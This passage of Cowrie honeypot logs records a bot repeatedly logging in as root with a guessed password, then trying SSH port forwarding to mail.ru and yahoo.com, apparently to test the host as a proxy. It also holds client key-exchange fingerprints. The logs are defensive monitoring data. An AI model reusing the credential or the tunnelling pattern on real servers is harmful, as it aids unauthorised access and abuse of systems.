57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.349190Z","src_ip":"77.83.207.83","session":"36656cb087ac"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.601644Z","src_ip":"77.83.207.83","session":"36656cb087ac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15365,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15365","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.653260Z","session":"36656cb087ac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.704159Z","src_ip":"77.83.207.83","session":"36656cb087ac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":151,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:151","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.848772Z","session":"36656cb087ac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:10.899156Z","src_ip":"77.83.207.83","session":"36656cb087ac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":26443,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26443","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.040724Z","session":"36656cb087ac"}
{"eventid":"cowrie.session.closed","duration":12.762283563613892,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.076513Z","src_ip":"212.227.235.229","session":"dd01621cd0e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.091232Z","src_ip":"77.83.207.83","session":"36656cb087ac"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.143000Z","src_ip":"77.83.207.83","session":"36656cb087ac"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39216,"dst_ip":"1.2.3.4","dst_port":22,"session":"313fceb41208","protocol":"ssh","message":"New connection: 77.83.207.83:39216 (1.2.3.4:22) [session: 313fceb41208]","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.193280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.194000Z","src_ip":"77.83.207.83","session":"313fceb41208"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.245103Z","src_ip":"77.83.207.83","session":"313fceb41208"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35690,"dst_ip":"1.2.3.4","dst_port":23,"session":"23733f27631a","protocol":"telnet","message":"New connection: 212.227.235.229:35690 (1.2.3.4:23) [session: 23733f27631a]","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.288577Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.498984Z","src_ip":"77.83.207.83","session":"313fceb41208"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3707,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:3707","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.551850Z","session":"313fceb41208"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.603459Z","src_ip":"77.83.207.83","session":"313fceb41208"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":30042,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30042","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.745325Z","session":"313fceb41208"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.796320Z","src_ip":"77.83.207.83","session":"313fceb41208"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":4981,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4981","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.941304Z","session":"313fceb41208"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:11.992265Z","src_ip":"77.83.207.83","session":"313fceb41208"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.043839Z","src_ip":"77.83.207.83","session":"313fceb41208"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39336,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b0cbeaad382","protocol":"ssh","message":"New connection: 77.83.207.83:39336 (1.2.3.4:22) [session: 3b0cbeaad382]","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.093383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.104176Z","src_ip":"77.83.207.83","session":"3b0cbeaad382"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.144400Z","src_ip":"77.83.207.83","session":"3b0cbeaad382"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.397477Z","src_ip":"77.83.207.83","session":"3b0cbeaad382"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12544,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12544","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.449200Z","session":"3b0cbeaad382"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.500340Z","src_ip":"77.83.207.83","session":"3b0cbeaad382"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":11985,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:11985","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.644969Z","session":"3b0cbeaad382"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.695513Z","src_ip":"77.83.207.83","session":"3b0cbeaad382"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":8954,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8954","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.841161Z","session":"3b0cbeaad382"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.891922Z","src_ip":"77.83.207.83","session":"3b0cbeaad382"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.943233Z","src_ip":"77.83.207.83","session":"3b0cbeaad382"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39456,"dst_ip":"1.2.3.4","dst_port":22,"session":"abe2c98fd854","protocol":"ssh","message":"New connection: 77.83.207.83:39456 (1.2.3.4:22) [session: abe2c98fd854]","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.992507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:12.993233Z","src_ip":"77.83.207.83","session":"abe2c98fd854"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.043356Z","src_ip":"77.83.207.83","session":"abe2c98fd854"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.293387Z","src_ip":"77.83.207.83","session":"abe2c98fd854"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5981,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5981","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.345100Z","session":"abe2c98fd854"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.395223Z","src_ip":"77.83.207.83","session":"abe2c98fd854"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":25005,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25005","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.536343Z","session":"abe2c98fd854"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.586494Z","src_ip":"77.83.207.83","session":"abe2c98fd854"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":2239,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2239","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.728457Z","session":"abe2c98fd854"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.778596Z","src_ip":"77.83.207.83","session":"abe2c98fd854"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.829842Z","src_ip":"77.83.207.83","session":"abe2c98fd854"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39556,"dst_ip":"1.2.3.4","dst_port":22,"session":"9475c39175cd","protocol":"ssh","message":"New connection: 77.83.207.83:39556 (1.2.3.4:22) [session: 9475c39175cd]","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.879037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.879963Z","src_ip":"77.83.207.83","session":"9475c39175cd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:13.930279Z","src_ip":"77.83.207.83","session":"9475c39175cd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.180100Z","src_ip":"77.83.207.83","session":"9475c39175cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2327,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2327","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.231116Z","session":"9475c39175cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.281492Z","src_ip":"77.83.207.83","session":"9475c39175cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":6923,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:6923","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.424484Z","session":"9475c39175cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.474882Z","src_ip":"77.83.207.83","session":"9475c39175cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":28420,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:28420","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.616636Z","session":"9475c39175cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.666862Z","src_ip":"77.83.207.83","session":"9475c39175cd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.717782Z","src_ip":"77.83.207.83","session":"9475c39175cd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39633,"dst_ip":"1.2.3.4","dst_port":22,"session":"851fba142e4f","protocol":"ssh","message":"New connection: 77.83.207.83:39633 (1.2.3.4:22) [session: 851fba142e4f]","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.765953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:14.766881Z","src_ip":"77.83.207.83","session":"851fba142e4f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp